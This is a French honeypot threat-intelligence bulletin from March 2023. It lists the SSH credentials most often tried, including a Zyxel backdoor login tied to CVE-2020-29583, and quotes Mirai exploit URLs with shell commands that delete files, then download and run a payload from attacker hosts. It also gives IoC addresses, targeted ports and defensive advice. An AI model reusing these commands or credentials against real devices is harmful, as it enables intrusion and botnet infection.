Notre sélection des alertes de nos honeypots : bulletin 6 – mars 2023

Une bonne compréhension des menaces actuelles est nécessaire pour atteindre une bonne posture de sécurité. Le rapport suivant présente les tendances actuelles qui se dégagent du bruit de fond de l’internet en se basant sur les données des deux semaines de logs de nos Honeypots.

Principaux identifiants testés par les cyber acteurs malveillants sur le protocole SSH

Dans le tableau ci-dessous, vous trouverez les identifiants les plus testés sur le protocole SSH par les acteurs de la cybermenace au cours des deux dernières semaines. Il s’agit une fois de plus d’excellents exemples d’identifiants/mots de passe que les acteurs de la menace essaient d’utiliser sur chaque machine connectée à Internet. Premier conseil : assurez-vous que les machines qui n’ont pas besoin d’être connectées publiquement à l’internet ne le soient pas.

En outre, ces identifiants largement testés dans le cyberespace constituent des renseignements utiles pour créer des dictionnaires de couple login/mot de passe. À titre d’exemple, cela aidera votre RSSI à empêcher l’utilisation de ces identifiants basiques dans les systèmes informatiques qu’il doit protéger.

Login	Mot de passe
3comcso	RIP000
Administrateur	Mot de passe
utilisateur ftp	3245gs5662d34
git	3245gs5662d34
oracle	123456
oracle	3245gs5662d34
oracle	oracle123
pi	framboise
postgres	123456
postgres	3245gs5662d34
PSEAdmin	$secure$
soutien	123456
telnet	123456
ubnt	l’administration
ubuntu	123456
ubuntu	3245gs5662d34
ubuntu	123456
vadmin	9vt@f3Vt
zyfwp	PrOw!aN_fXp

Les derniers identifiants zyfwp/PrOw!aN_fXp font référence à la CVE-2020-29583 (CVSSv3 : 9.8) sur la version 4.60 du firmware des appareils Zyxel USG et permettent d’utiliser ce compte pour se connecter au serveur SSH ou à l’interface web avec des privilèges d’administrateur.

Nos honeypots : inévitables victimes du botnet Mirai

Semaine après semaine, nos honeypots sont frappés sans relâche par des cyber acteurs malveillants qui tentent d’enrôler de plus en plus d’appareils dans leur flotte de botnet Mirai. Ils ciblent tout appareil connecté à Internet pour rassembler une armée de botnets afin d’être le plus efficace possible et lancer des attaques massives telles que les DDoS.

Ce type d’acteur malveillant utilise le même user agent : Hello, world.

En mars, nos honeypots déployés à l’international ont été ciblés par les URL suivantes :

/shell?cd+/tmp;rm+-rf+*;wget+94.158.247[.]123/jaws;sh+/tmp/jaws

L’adresse IP 94.158.247[.]123 (hébergée par AS 39798 MivoCloud SRL – US) inclue dans l’URL ci-dessus est identifiée comme botnet Mirai de 2023 dans VirusTotal. 55 adresses IP ont ciblé nos leurres informatiques à l’international avec cette requête URL.

/shell?cd+/tmp;rm+-rf+*;wget+128.199.134[.]42/jaws;sh+/tmp/jaws

L’adresse IP 128.199.134[.]42 (hébergée par AS AS 14061 DIGITALOCEAN-ASN – SG) inclue dans l’URL ci-dessus est identifiée comme botnet Mirai dans VirusTotal. 55 adresses IP ont ciblé nos honeypots avec cette requête URL.

/shell?cd+/tmp;rm+-rf+*;wget+botbet.catbbos[.]fun/jaws;sh+/tmp/jaws

Le domaine botbet.catbbos[.]fun inclus dans l’URL ci-dessus (créé il y a un mois) est signalé comme étant lié au botnet Mirai dans VirusTotal. 52 adresses IP ont testé cette requête URL sur nos honeypots.

/shell?cd+/tmp;rm+-rf+*;wget+45.77.243.49/jaws;sh+/tmp/jaws

L’adresse IP 45.77.243.49 (hébergée par AS 20473 AS-CHOOPA – SG) incluse dans l’URL ci-dessus est signalée comme malveillante dans VirusTotal. 45 adresses IP ont ciblé nos pots de miel mondiaux avec cette demande d’URL.

Les acteurs de la menace cyber ont tenté d’exploiter une vulnérabilité d’exécution de commande Shell sur les enregistreurs vidéo MVPower qui peut permettre à des attaquants d’exécuter des commandes à distance sur les systèmes vulnérables. Elle est connue comme la vulnérabilité CVE-2016-20016 (CVSSv3 : 9,8).

Nous avons découvert que 75 % des adresses IP ciblant honeypots provenaient du Vietnam, les autres étant chinoises. 41 % des adresses IP ne sont pas connues des bases de données publiques identifiant les adresses IP malveillantes.

Voici la répartition de l’AS :

AS	%
AS 140803 8, 195 Street, Thang Town, Hiep Hoa, Bac Giang, Viet Nam	75%
AS 4134 Chinanet	10%
AS 4837 CHINA UNICOM China169 Backbone	2,5%
AS 56040 China Mobile communications corporation	2,5%
AS 140903 CHINA TELECOM	2,5%
AS 4837 CHINA UNICOM China169 Backbone	2,5%
AS 4847 Réseaux d’échange avec la Chine	2,5%
AS 56040 China Mobile communications corporation	2,5%

IoCs :

• 1.119.168[.]202 
• 120.237.206[.]76
• 27.129.128[.]239
• 60.223.233[.]250
• 183.237.207[.]140
• 218.23.126[.]101
• 218.4.170[.]126
• 220.180.37[.]203
• 60.161.138[.]28
• 60.221.224[.]111
• 103.178.229[.]142
• 103.162.28[.]193
• 103.162.29[.]181
• 103.162.29[.]185
• 103.167.196[.]147
• 103.178.229[.]37
• 103.167.196[.]181
• 103.173.157[.]235
• 103.178.229[.]11
• 103.178.229[.]131
• 103.162.28[.]117
• 103.162.28[.]195
• 103.162.29[.]52
• 103.173.157[.]193
• 103.178.229[.]148
• 103.161.177[.]39
• 103.167.196[.]133
• 103.167.197[.]108
• 103.173.156[.]252
• 103.178.228[.]111
• 103.167.197[.]64
• 103.173.157[.]229
• 103.178.228[.]218
• 103.167.196[.]170
• 103.167.197[.]116
• 103.173.157[.]212
• 103.173.157[.]220
• 103.173.157[.]234
• 103.173.157[.]250

Principaux ports/protocoles ciblés par les groupes cyber malveillants

Ports	Protocole
445	TCP
22	TCP
23	TCP
80	TCP
6379	TCP
9100 & 9115	TCP
443	TCP
8088	TCP
5060	UDP
5555	TCP

Une des bonnes pratiques consiste à bloquer le trafic entrant vers les ports inutilisés, tandis que les ports ouverts au trafic doivent être prudemment surveillés et protégés.

Tentatives de déni de service (DoS) et de déni de service distribué (DDoS) sur nos honeypots

Tentatives d’exploitation de la CVE-2022-27255 observées sur nos honeypots